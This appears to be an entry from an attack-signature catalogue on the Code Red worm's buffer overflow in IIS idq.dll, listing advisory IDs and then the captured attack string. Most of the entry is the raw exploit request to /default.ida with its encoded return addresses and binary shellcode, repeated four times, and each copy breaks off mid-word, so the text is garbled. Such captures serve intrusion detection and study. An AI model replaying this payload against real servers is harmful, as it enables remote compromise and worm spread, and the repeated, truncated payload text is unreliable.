Code-red

Against

IIS on Windows

IDs

CERT-Advisory: CA-2001-13
Microsoft: MS01-033
Bugtraq: 2880
CVE: CAN-2001-0500

Category

Buffer overflow

Effect

Remote access

Source

Captured with snort

Description

An unchecked buffer in idq.dll allows execution of arbitrary code.

Attack string

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
Content-type: text/xml
Content-length: 3379 

ÈÈ�`è���Ìëþdgÿ6��dg‰&��èß��h��…\þÿÿPÿUœ…\þÿÿPÿU˜‹@‹‰XþÿÿÿUä=��”Á=��”Å
ͶɉTþÿÿ‹u~0š��„Ä���ÇF0š��è
���CodeRedII�‹$ÿUØfÀ•…8þÿÿÇ…Pþÿÿ���j�…PþÿÿP…8þÿÿP‹Eÿpÿ„���€½8þÿÿthSÿUÔÿUìE„i½Tþÿÿ,��Ç,��èÒ��÷ЯljF4EˆPj�ÿuè���éÿÿÿj�j�ÿUðPÿUÐOuÒè;��i½Tþÿÿ�\&Ç�\&WÿUèj�jÿUŒjÿÿUèëù‹F4)E„jdÿU荅<þÿÿPÿUÀ·…<þÿÿ=Ò��sÏ·…>þÿÿƒø
sÃfÇ…pÿÿÿ�fÇ…rÿÿÿ�Pèd��‰tÿÿÿj�jjÿU¸ƒøÿtò‰E€jTh~f€ÿu€ÿU¤Yj…pÿÿÿPÿu€ÿU°»���ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ���‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�jÿU “j�Th~f€ÿu€ÿU¤Yƒûu1è����X-Ó��j�hê��Pÿu€ÿU¬=ê��uj�j…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ���û���xu»��ð¿`è���‹d$dg��XaëÙdgÿ6��dg‰&��f;MZuã‹K<<PE��u׋TxÓ‹B<KERNuŁ|EL32u»3ÉI‹r óüA­<GetPuõ|rocAuëJIÑáJ$·ÁáJ‹ÉD$$dg��XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè���Sleep�ÿuüÿUø‰Eèè���GetSystemDefaultLangID�ÿuüÿUø‰Eäè���GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè���GlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
Content-type: text/xml
Content-length: 3379 

ÈÈ�`è���Ìëþdgÿ6��dg‰&��èß��h��…\þÿÿPÿUœ…\þÿÿPÿU˜‹@‹‰XþÿÿÿUä=��”Á=��”Å
ͶɉTþÿÿ‹u~0š��„Ä���ÇF0š��è
���CodeRedII�‹$ÿUØfÀ•…8þÿÿÇ…Pþÿÿ���j�…PþÿÿP…8þÿÿP‹Eÿpÿ„���€½8þÿÿthSÿUÔÿUìE„i½Tþÿÿ,��Ç,��èÒ��÷ЯljF4EˆPj�ÿuè���éÿÿÿj�j�ÿUðPÿUÐOuÒè;��i½Tþÿÿ�\&Ç�\&WÿUèj�jÿUŒjÿÿUèëù‹F4)E„jdÿU荅<þÿÿPÿUÀ·…<þÿÿ=Ò��sÏ·…>þÿÿƒø
sÃfÇ…pÿÿÿ�fÇ…rÿÿÿ�Pèd��‰tÿÿÿj�jjÿU¸ƒøÿtò‰E€jTh~f€ÿu€ÿU¤Yj…pÿÿÿPÿu€ÿU°»���ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ���‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�jÿU “j�Th~f€ÿu€ÿU¤Yƒûu1è����X-Ó��j�hê��Pÿu€ÿU¬=ê��uj�j…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ���û���xu»��ð¿`è���‹d$dg��XaëÙdgÿ6��dg‰&��f;MZuã‹K<<PE��u׋TxÓ‹B<KERNuŁ|EL32u»3ÉI‹r óüA­<GetPuõ|rocAuëJIÑáJ$·ÁáJ‹ÉD$$dg��XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè���Sleep�ÿuüÿUø‰Eèè���GetSystemDefaultLangID�ÿuüÿUø‰Eäè���GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè���GlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
Content-type: text/xml
Content-length: 3379 

ÈÈ�`è���Ìëþdgÿ6��dg‰&��èß��h��…\þÿÿPÿUœ…\þÿÿPÿU˜‹@‹‰XþÿÿÿUä=��”Á=��”Å
ͶɉTþÿÿ‹u~0š��„Ä���ÇF0š��è
���CodeRedII�‹$ÿUØfÀ•…8þÿÿÇ…Pþÿÿ���j�…PþÿÿP…8þÿÿP‹Eÿpÿ„���€½8þÿÿthSÿUÔÿUìE„i½Tþÿÿ,��Ç,��èÒ��÷ЯljF4EˆPj�ÿuè���éÿÿÿj�j�ÿUðPÿUÐOuÒè;��i½Tþÿÿ�\&Ç�\&WÿUèj�jÿUŒjÿÿUèëù‹F4)E„jdÿU荅<þÿÿPÿUÀ·…<þÿÿ=Ò��sÏ·…>þÿÿƒø
sÃfÇ…pÿÿÿ�fÇ…rÿÿÿ�Pèd��‰tÿÿÿj�jjÿU¸ƒøÿtò‰E€jTh~f€ÿu€ÿU¤Yj…pÿÿÿPÿu€ÿU°»���ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ���‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�jÿU “j�Th~f€ÿu€ÿU¤Yƒûu1è����X-Ó��j�hê��Pÿu€ÿU¬=ê��uj�j…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ���û���xu»��ð¿`è���‹d$dg��XaëÙdgÿ6��dg‰&��f;MZuã‹K<<PE��u׋TxÓ‹B<KERNuŁ|EL32u»3ÉI‹r óüA­<GetPuõ|rocAuëJIÑáJ$·ÁáJ‹ÉD$$dg��XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè���Sleep�ÿuüÿUø‰Eèè���GetSystemDefaultLangID�ÿuüÿUø‰Eäè���GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè���GlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
Content-type: text/xml
Content-length: 3379 

ÈÈ�`è���Ìëþdgÿ6��dg‰&��èß��h��…\þÿÿPÿUœ…\þÿÿPÿU˜‹@‹‰XþÿÿÿUä=��”Á=��”Å
ͶɉTþÿÿ‹u~0š��„Ä���ÇF0š��è
���CodeRedII�‹$ÿUØfÀ•…8þÿÿÇ…Pþÿÿ���j�…PþÿÿP…8þÿÿP‹Eÿpÿ„���€½8þÿÿthSÿUÔÿUìE„i½Tþÿÿ,��Ç,��èÒ��÷ЯljF4EˆPj�ÿuè���éÿÿÿj�j�ÿUðPÿUÐOuÒè;��i½Tþÿÿ�\&Ç�\&WÿUèj�jÿUŒjÿÿUèëù‹F4)E„jdÿU荅<þÿÿPÿUÀ·…<þÿÿ=Ò��sÏ·…>þÿÿƒø
sÃfÇ…pÿÿÿ�fÇ…rÿÿÿ�Pèd��‰tÿÿÿj�jjÿU¸ƒøÿtò‰E€jTh~f€ÿu€ÿU¤Yj…pÿÿÿPÿu€ÿU°»���ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ���‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�jÿU “j�Th~f€ÿu€ÿU¤Yƒûu1è����X-Ó��j�hê��Pÿu€ÿU¬=ê��uj�j…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ���û���xu»��ð¿`è���‹d$dg��XaëÙdgÿ6��dg‰&��f;MZuã‹K<<PE��u׋TxÓ‹B<KERNuŁ|EL32u»3ÉI‹r óüA­<GetPuõ|rocAuëJIÑáJ$·ÁáJ‹ÉD$$dg��XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè���Sleep�ÿuüÿUø‰Eèè���GetSystemDefaultLangID�ÿuüÿUø‰Eäè���GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè���Glob

Attack program source

None available.